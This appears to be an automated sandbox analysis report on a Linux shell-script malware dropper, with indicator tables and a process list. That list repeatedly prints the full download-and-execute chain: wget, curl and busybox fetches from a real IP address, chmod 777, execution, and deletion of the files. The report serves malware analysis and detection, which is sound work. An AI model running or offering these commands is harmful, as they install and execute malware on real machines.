| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
Processes
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
